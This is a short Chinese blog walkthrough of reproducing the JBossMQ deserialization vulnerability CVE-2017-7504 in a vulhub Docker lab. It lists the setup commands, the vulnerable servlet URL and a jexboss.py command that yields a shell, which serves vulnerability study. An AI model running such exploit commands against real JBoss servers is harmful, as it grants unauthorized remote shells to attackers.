当前位置: 首页 > article >正文

JbossMQ反序列化漏洞CVE-2017-7504

1.环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d

2.访问漏洞地址

JBossMQ HTTP-IL Servleticon-default.png?t=O83Ahttp://47.121.211.205:8080/jbossmq-httpil/HTTPServerILServlet

3.运行python文件

python3 jexboss.py -u http://47.121.211.205:8080

成功获取shell


http://www.kler.cn/a/316198.html

相关文章:

  • 搭建Python2和Python3虚拟环境
  • 相机光学(四十二)——sony的HDR技术
  • Android音频架构
  • 论软件维护及其应用子问题
  • Python如何用正则表达式匹配并处理文件名
  • 43.第二阶段x86游戏实战2-提取游戏里面的lua
  • WPF 异步
  • Qt 注册表操作
  • 数据结构--顺序表的创建和增删改查操作
  • windows docker下启动mysql报Bind on unix socket: Input/output error
  • Nginx越界读取缓存漏洞(CVE-2017-7529)
  • 【ShuQiHere】 探索数据挖掘的世界:从概念到应用
  • c++中std::find()函数
  • 【测试】——Selenium API (万字详解)
  • 【dom操作基础】案例题1
  • Ubuntu24.04中安装Electron
  • 8. 防火墙
  • JAVA并发编程系列(8)CountDownLatch核心原理
  • 基于等保2.0标准——区块链安全扩展要求探讨
  • git 介绍+常用命令
  • LeetCode 2374.边积分最高的节点:模拟
  • Git 推送更改到远程仓库
  • 什么是量化交易,纸质股票现在还能交易吗?怎么交易
  • 基于机器学习的注意力缺陷/多动障碍 (ADHD)(python论文+代码)HYPERAKTIV
  • 路径处理 | 关键点提取之Douglas–Peucker算法(附ROS C++/Python实现)
  • 分布式锁的几种方案对比?你了解多少种呢?